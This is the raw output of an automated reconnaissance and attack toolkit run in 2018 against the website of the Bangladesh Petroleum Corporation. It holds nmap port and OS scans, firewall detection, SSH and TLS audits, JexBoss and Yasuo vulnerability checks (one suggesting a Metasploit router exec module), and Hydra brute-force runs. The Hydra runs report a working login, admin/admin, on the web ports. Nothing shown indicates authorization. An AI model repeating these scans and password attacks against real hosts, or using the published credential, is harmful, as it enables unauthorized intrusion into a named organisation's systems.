- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.20s latency).
- Not shown: 11 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:08 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: Linux 2.4.X|2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
- OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 105.68 ms 10.251.200.1
- 2 105.73 ms 185.94.189.129
- 3 104.10 ms 185.206.226.109
- 4 104.97 ms 213.248.70.225
- 5 220.50 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 221.80 ms 80.91.251.243
- 7 204.54 ms atl-b22-link.telia.net (62.115.125.191)
- 8 220.52 ms 80.91.246.75
- 9 221.15 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 217.15 ms 207.210.229.6
- 11 221.88 ms 174.136.31.214
- 12 ... 30
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- # message authentication code algorithms
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 22/tcp closed ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 12 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 102.43 ms 10.251.200.1
- 2 102.68 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 104.63 ms 185.206.226.109
- 4 104.66 ms 213.248.70.225
- 5 229.15 ms prs-bb4-link.telia.net (62.115.138.138)
- 6 218.30 ms 62.115.122.159
- 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
- 8 221.11 ms 80.91.246.75
- 9 217.75 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 217.74 ms 207.210.229.6
- 11 222.77 ms 174.136.31.214
- 12 221.44 ms 173.237.136.21
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:19 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain?
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 109.51 ms 10.251.200.1
- 2 109.59 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 104.85 ms 185.206.226.109
- 4 104.87 ms 213.248.70.225
- 5 221.30 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 219.96 ms 80.91.251.243
- 7 200.12 ms atl-b22-link.telia.net (62.115.125.128)
- 8 223.67 ms 80.91.246.75
- 9 221.92 ms 213.248.71.138
- 10 220.79 ms 207.210.229.6
- 11 220.76 ms infweb6.smtpserve.com (72.29.120.126)
- 12 220.80 ms 173.237.136.21
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.bpc.gov.bd
- The site http://www.bpc.gov.bd is behind a Trustwave ModSecurity
- Number of requests: 6
- ######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://www.bpc.gov.bd...
- _________________ SITE INFO __________________
- IP Title
- 173.237.136.21 Bangladesh Petroleum Corporat
- __________________ VERSION ___________________
- Name Versions Type
- PHP Platform
- jQuery 1.6.3 JavaScript
- ________________ INTERESTING _________________
- URL Note Type
- /login.php Login Page Interesting
- ______________________________________________
- Time: 1.6 sec Urls: 620 Fingerprints: 40401
- ######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Fri, 23 Nov 2018 05:31:07 GMT
- Content-Type: text/html; charset=UTF-8
- Content-Encoding: gzip
- Connection: keep-alive
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [23-11-2018 00:31:49]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
- [ INFO ][ DORK ]::[ site:www.bpc.gov.bd ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.tn ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.tz ID: 012984904789461885316:oy3-mu17hxk ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [23-11-2018 00:31:58]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.bpc.gov.bd.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:32 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 205 guesses in 184 seconds, average tps: 1.0
- |_pop3-capabilities: USER CAPA RESP-CODES STLS TOP AUTH-RESP-CODE PIPELINING UIDL SASL(PLAIN LOGIN)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 103.05 ms 173.237.136.21
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://www.bpc.gov.bd
- The site https://www.bpc.gov.bd is behind a Trustwave ModSecurity
- Number of requests: 6
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginHSTS
- PluginChromeSha1Deprecation
- PluginSessionResumption
- PluginSessionRenegotiation
- PluginCertInfo
- PluginOpenSSLCipherSuites
- PluginHeartbleed
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- www.bpc.gov.bd:443 => 173.237.136.21:443
- SCAN RESULTS FOR WWW.BPC.GOV.BD:443 - 173.237.136.21:443
- --------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
- Common Name: bpc.gov.bd
- Issuer: bpc.gov.bd
- Serial Number: 0136C4F852
- Not Before: Jul 5 15:19:17 2018 GMT
- Not After: Jul 5 15:19:17 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['bpc.gov.bd']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- SCAN COMPLETED IN 49.26 S
- -------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server www.bpc.gov.bd on port 443 using SNI name www.bpc.gov.bd
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: bpc.gov.bd
- Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
- Issuer: bpc.gov.bd
- Not valid before: Jul 5 15:19:17 2018 GMT
- Not valid after: Jul 5 15:19:17 2019 GMT
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.bpc.gov.bd:8080
- The site http://www.bpc.gov.bd:8080 is behind a Trustwave ModSecurity
- Number of requests: 6
- http://www.bpc.gov.bd:8080 [403 Forbidden] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[403 Forbidden], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server www.bpc.gov.bd on port 8080 using SNI name www.bpc.gov.bd
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://www.bpc.gov.bd:8080 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.bpc.gov.bd:8443
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://www.bpc.gov.bd:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server www.bpc.gov.bd on port 8443 using SNI name www.bpc.gov.bd
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: bpc.gov.bd
- Altnames: DNS:bpc.gov.bd, DNS:mail.bpc.gov.bd, DNS:www.bpc.gov.bd
- Issuer: bpc.gov.bd
- Not valid before: Jul 5 15:19:17 2018 GMT
- Not valid after: Jul 5 15:19:17 2019 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginSessionRenegotiation
- PluginOpenSSLCipherSuites
- PluginHSTS
- PluginSessionResumption
- PluginChromeSha1Deprecation
- PluginHeartbleed
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- www.bpc.gov.bd:8443 => 173.237.136.21:8443
- SCAN RESULTS FOR WWW.BPC.GOV.BD:8443 - 173.237.136.21:8443
- ----------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 3d184337b914105414d261eec073e98185b0cdc9
- Common Name: bpc.gov.bd
- Issuer: bpc.gov.bd
- Serial Number: 0136C4F852
- Not Before: Jul 5 15:19:17 2018 GMT
- Not After: Jul 5 15:19:17 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['bpc.gov.bd', 'mail.bpc.gov.bd', 'www.bpc.gov.bd']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['bpc.gov.bd']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- NULL-SHA256 timeout - timed out
- NULL-SHA timeout - timed out
- NULL-MD5 timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC3-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDH-RSA-NULL-SHA timeout - timed out
- ECDH-RSA-DES-CBC3-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC3-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- SCAN COMPLETED IN 58.03 S
- -------------------------
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: https://www.bpc.gov.bd:8443 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- * Info: review, suggestions, updates, etc:
- https://github.com/joaomatosf/jexboss
- * DONATE: Please consider making a donation to help improve this tool,
- * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
- ######################################################################################################################################
- I, [2018-11-23T00:42:52.764399 #18378] INFO -- : Initiating port scan
- I, [2018-11-23T00:43:53.632428 #18378] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-42-52.xml
- I, [2018-11-23T00:43:53.633772 #18378] INFO -- : Discovered open port: 173.237.136.21:80
- I, [2018-11-23T00:43:54.601472 #18378] INFO -- : Discovered open port: 173.237.136.21:443
- I, [2018-11-23T00:43:56.407608 #18378] INFO -- : Discovered open port: 173.237.136.21:465
- I, [2018-11-23T00:43:57.796636 #18378] INFO -- : Discovered open port: 173.237.136.21:993
- I, [2018-11-23T00:44:00.018622 #18378] INFO -- : Discovered open port: 173.237.136.21:995
- I, [2018-11-23T00:44:02.253780 #18378] INFO -- : Discovered open port: 173.237.136.21:8443
- I, [2018-11-23T00:44:04.043590 #18378] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:48 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.20s latency).
- Not shown: 16 closed ports, 1 filtered port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 443/tcp open https
- 993/tcp open imaps
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- #######################################################################################################################################
- [STATUS] 5.53 tries/min, 210 tries in 00:38h, 18 to do in 00:04h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:09
- + -- --=[Port 22 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:09
- [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
- [DATA] attacking ssh://www.bpc.gov.bd:22/
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking ssh://www.bpc.gov.bd:22/
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-get://www.bpc.gov.bd:80//
- [80][http-get] host: www.bpc.gov.bd login: admin password: admin
- [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:14
- + -- --=[Port 110 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:28:23
- [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
- [DATA] attacking http-gets://www.bpc.gov.bd:443//
- [443][http-get] host: www.bpc.gov.bd login: admin password: admin
- [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:28:27
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 993 opened... running tests...
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:18:43
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 1521 closed... skipping.
